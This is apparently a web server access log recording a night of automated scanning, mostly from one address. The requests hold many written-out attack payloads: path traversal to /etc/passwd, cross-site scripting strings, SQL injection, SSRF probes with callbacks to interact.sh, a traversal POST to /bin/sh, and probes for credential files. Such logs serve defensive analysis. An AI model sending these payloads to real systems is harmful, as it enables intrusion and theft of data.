90.151.171.108 - - [08/Mar/2023:03:55:28 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:03:55:33 +0530] "GET /?url=http://0177.0.0.1/server-status HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:03:55:33 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:03:55:33 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:03:55:38 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:03:55:38 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [08/Mar/2023:03:55:43 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:03:55:43 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:03:56:41 +0530] "POST /admin/index.php?id=pages HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:03:57:06 +0530] "GET /login.php/'%3E%3Csvg/onload=alert%602Mgie2IJ4y09WXaFJW1lP78oDbb%60%3E HTTP/1.1" 404 1132
72.44.65.82 - - [08/Mar/2023:03:57:44 +0530] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:03:59:38 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:03:59:39 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:04:01:57 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:04:02:05 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:04:02:13 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:04:02:16 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:04:02:27 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:04:14:14 +0530] "GET /heapdump HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:04:14:15 +0530] "GET /actuator/heapdump HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:04:14:16 +0530] "GET /ics?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&tool=search HTTP/1.1" 404 1000
72.44.65.82 - - [08/Mar/2023:04:14:24 +0530] "GET /GallerySite/filesrc/fotoilan/388/middle//../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:04:15:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:04:19:02 +0530] "POST /public/index.php/home/index/bind_follow/?is_ajax=1&publicid=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 1074
72.44.65.82 - - [08/Mar/2023:04:21:26 +0530] "GET /overview.html HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:04:23:44 +0530] "POST /axis2-admin/login HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:04:23:48 +0530] "POST /axis2/axis2-admin/login HTTP/1.1" 404 1040
198.235.24.47 - - [08/Mar/2023:04:34:26 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:04:44:34 +0530] "POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1" 404 1086
72.44.65.82 - - [08/Mar/2023:04:45:48 +0530] "GET /login/ HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:04:46:20 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:04:46:24 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 404 1044
89.43.3.66 - - [08/Mar/2023:04:46:40 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:04:47:04 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_weberpcustomer HTTP/1.1" 404 1012
46.191.249.231 - - [08/Mar/2023:04:51:32 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:04:51:33 +0530] "GET /api/profile HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:04:51:33 +0530] "GET /alps/profile HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:04:52:29 +0530] "GET /openam/ui/PWResetUserValidation HTTP/1.1" 404 1056
72.44.65.82 - - [08/Mar/2023:04:52:31 +0530] "GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1" 404 1070
90.151.171.106 - - [08/Mar/2023:04:56:13 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:04:56:13 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:04:56:13 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:04:56:13 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:04:56:13 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:04:56:18 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:04:56:18 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:04:56:18 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:04:57:02 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:05:07:03 +0530] "GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:05:07:12 +0530] "GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:05:07:46 +0530] "GET /formLoginAuth.htm?action=login&authCode=1&goURL&userName=admin HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:05:09:42 +0530] "GET /clusters HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:05:10:31 +0530] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix HTTP/1.1" 404 1088
72.44.65.82 - - [08/Mar/2023:05:12:10 +0530] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:05:12:36 +0530] "GET /index.php?r=installer/welcome HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:05:13:12 +0530] "GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1136
107.189.7.43 - - [08/Mar/2023:05:14:31 +0530] "CONNECT baidu.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:05:16:04 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:05:17:13 +0530] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1" 404 1166
72.44.65.82 - - [08/Mar/2023:05:17:23 +0530] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 992
72.44.65.82 - - [08/Mar/2023:05:17:40 +0530] "GET /api/users/search_authors HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:05:32:37 +0530] "GET /system/console/bundles HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:05:33:36 +0530] "GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:05:33:51 +0530] "GET /groovyconsole HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:05:36:00 +0530] "GET /?appurl=aHR0cDovL2ludGVyYWN0LnNo&wp_nlm=confirmation HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:05:38:21 +0530] "GET /concrete5/index.php/install HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:05:39:33 +0530] "GET /install HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:05:41:52 +0530] "GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminemail=test@test.com&adminname=test&adminpassword=cXDCJF&adminusername=0krTTB HTTP/1.1" 404 1056
72.44.65.82 - - [08/Mar/2023:05:43:42 +0530] "GET /login HTTP/1.1" 404 1004
72.44.65.82 - - [08/Mar/2023:05:44:05 +0530] "GET /OA_HTML/bin/sqlnet.log HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:05:44:30 +0530] "GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1" 404 1046
90.151.171.108 - - [08/Mar/2023:05:46:30 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:05:46:31 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:05:46:36 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:05:46:36 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:05:46:41 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:05:46:41 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:05:46:46 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:05:46:46 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:05:47:32 +0530] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:06:01:36 +0530] "GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:06:01:42 +0530] "GET /credentials/config.json HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:06:01:53 +0530] "GET /ReportServer?cmd=sc_getconnectioninfo&op=fr_server HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:06:02:00 +0530] "GET /WebReport/ReportServer?cmd=sc_getconnectioninfo&op=fr_server HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:06:02:16 +0530] "GET /index.php?controller=CommentGrade&fc=module&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt)&module=productcomments HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:06:03:30 +0530] "GET /awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:06:04:52 +0530] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:06:05:55 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:06:06:24 +0530] "GET /?ct_baths_plus&ct_beds_plus&ct_brokerage=0&ct_city&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_keyword&ct_lotsize_from&ct_lotsize_to&ct_mls&ct_mobile_keyword&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_year_from&ct_year_to&ct_zipcode&lat&lng&search-listings=true HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:06:07:15 +0530] "POST /search.php?searchtype=5 HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:06:08:41 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:06:09:11 +0530] "POST / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:06:09:54 +0530] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:06:10:20 +0530] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 403 1004
90.151.171.106 - - [08/Mar/2023:06:11:39 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:06:11:39 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:06:11:39 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:11:39 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:11:39 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:06:11:44 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:11:44 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:06:11:44 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:06:14:01 +0530] "GET /badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:06:15:27 +0530] "GET /ansible.cfg HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:06:26:00 +0530] "GET /backend/backend/auth/signin HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:06:29:26 +0530] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 1104
72.44.65.82 - - [08/Mar/2023:06:29:28 +0530] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:06:29:40 +0530] "GET /__r2/query-printRows.view?query.containerFilterName=CurrentAndSubfolders&query.queryName=ListManager&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&schemaName=ListManager HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:06:31:27 +0530] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:06:32:03 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:06:33:42 +0530] "GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:06:35:34 +0530] "GET /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:06:35:45 +0530] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:06:36:47 +0530] "GET /index.php?file=../../../../../../../../../etc/passwd&id=50 HTTP/1.1" 404 1012
90.151.171.106 - - [08/Mar/2023:06:38:17 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:06:38:17 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:06:38:22 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:38:22 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:38:27 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:06:38:27 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:06:38:33 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:06:38:33 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:06:42:54 +0530] "POST /meaweb/os/mxperson HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:06:43:49 +0530] "GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:06:51:12 +0530] "GET /apiserver-etcd-client.key HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:06:53:04 +0530] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/ HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:06:55:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jphone HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:06:57:38 +0530] "GET /admin/?a=doSearchParameter&appno=0+union+select+98989*443131,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:06:59:56 +0530] "GET /_vti_bin/lists.asmx?WSDL HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:07:00:27 +0530] "GET /services/pluginscript/..;/..;/ HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:07:00:36 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:07:01:06 +0530] "GET /%5C%5Cinteract.sh/../ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:01:44 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:07:02:38 +0530] "GET /libraries/joomla/database/ HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:07:03:10 +0530] "GET /menu/ss?force_setup=1&sid=nsroot&username=nsroot HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:07:03:20 +0530] "GET /server/ HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:07:05:08 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:05:08 +0530] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:05:09 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:09:42 +0530] "GET /xml/User/User.xml HTTP/1.1" 404 1028
90.151.171.106 - - [08/Mar/2023:07:18:01 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:07:18:01 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:07:18:01 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:07:18:01 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:07:18:01 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:07:18:06 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:07:18:06 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:07:18:06 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:07:25:14 +0530] "POST /NateMail.php HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:07:25:45 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:07:27:20 +0530] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:07:28:44 +0530] "POST /api/users HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:07:28:51 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jvehicles HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:07:29:09 +0530] "POST /admin/auth/reset-password HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:07:30:32 +0530] "GET /jobmanager/logs/../../../../../../../../../../../../tmp/poc HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:32 +0530] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:34 +0530] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:34 +0530] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:36 +0530] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:36 +0530] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:37 +0530] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:38 +0530] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:38 +0530] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:39 +0530] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 -
185.149.40.210 - - [08/Mar/2023:07:31:39 +0530] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:46:36 +0530] "GET /credentials.json HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:07:46:44 +0530] "GET /assets/credentials.json HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:07:47:13 +0530] "POST /wp-admin/admin-post.php HTTP/1.1" 404 1040
199.195.248.153 - - [08/Mar/2023:07:49:45 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:07:52:21 +0530] "GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1" 404 1170
72.44.65.82 - - [08/Mar/2023:07:53:41 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:07:55:56 +0530] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 1034
92.118.39.82 - - [08/Mar/2023:07:57:17 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:07:57:18 +0530] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1088
72.44.65.82 - - [08/Mar/2023:07:57:28 +0530] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:07:57:52 +0530] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1092
72.44.65.82 - - [08/Mar/2023:08:02:03 +0530] "GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 1042
90.151.171.106 - - [08/Mar/2023:08:06:49 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:08:06:49 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:08:06:49 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:08:06:49 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:08:06:49 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:08:06:54 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:08:06:54 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:08:06:54 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:08:09:01 +0530] "GET /vcac/ HTTP/1.1" 404 1004
72.44.65.82 - - [08/Mar/2023:08:11:32 +0530] "GET /.github/workflows/ci.yml HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:08:11:33 +0530] "GET /.github/workflows/ci.yaml HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:08:12:04 +0530] "GET /.github/workflows/build.yml HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:08:12:11 +0530] "GET /.github/workflows/build.yaml HTTP/1.1" 404 1050
72.44.65.82 - - [08/Mar/2023:08:12:25 +0530] "GET /.github/workflows/test.yaml HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:08:12:26 +0530] "GET /.github/workflows/tests.yml HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:08:12:56 +0530] "GET /.github/workflows/deploy.yml HTTP/1.1" 404 1050
72.44.65.82 - - [08/Mar/2023:08:13:00 +0530] "GET /.github/workflows/push.yml HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:08:13:22 +0530] "GET /.github/workflows/release.yaml HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:08:13:36 +0530] "GET /.github/workflows/automerge.yml HTTP/1.1" 404 1056
72.44.65.82 - - [08/Mar/2023:08:13:37 +0530] "GET /.github/workflows/docker.yml HTTP/1.1" 404 1050
72.44.65.82 - - [08/Mar/2023:08:13:48 +0530] "GET /.github/workflows/ci-push.yml HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:08:14:09 +0530] "GET /.github/workflows/smoosh-status.yml HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:08:14:16 +0530] "GET /.github/workflows/snyk.yml HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:08:15:50 +0530] "POST /htdocs/login/login.lua HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:08:18:35 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:08:20:18 +0530] "GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1" 404 1162
72.44.65.82 - - [08/Mar/2023:08:20:57 +0530] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:08:21:00 +0530] "POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1" 404 1124
72.44.65.82 - - [08/Mar/2023:08:21:00 +0530] "GET /wp-content/uploads/2MgieIB6lFndgr6RNJiGFZL9mZE.php HTTP/1.1" 404 1094
72.44.65.82 - - [08/Mar/2023:08:21:25 +0530] "GET /../../../..//etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:08:21:53 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:08:22:55 +0530] "POST /ibmmq/console/j_security_check HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:08:22:56 +0530] "POST /ibmmq/console/j_security_check HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:08:40:22 +0530] "GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:08:40:24 +0530] "GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:08:41:10 +0530] "GET /tour-list/?avaibility=13&keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:08:41:36 +0530] "GET /wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:08:45:24 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:08:46:12 +0530] "POST /kindeditor/php/demo.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:08:46:19 +0530] "POST /php/demo.php HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:08:46:46 +0530] "GET //www.interact.sh HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:08:47:44 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:08:51:48 +0530] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 404 1118
72.44.65.82 - - [08/Mar/2023:08:53:16 +0530] "GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1" 404 1080
90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
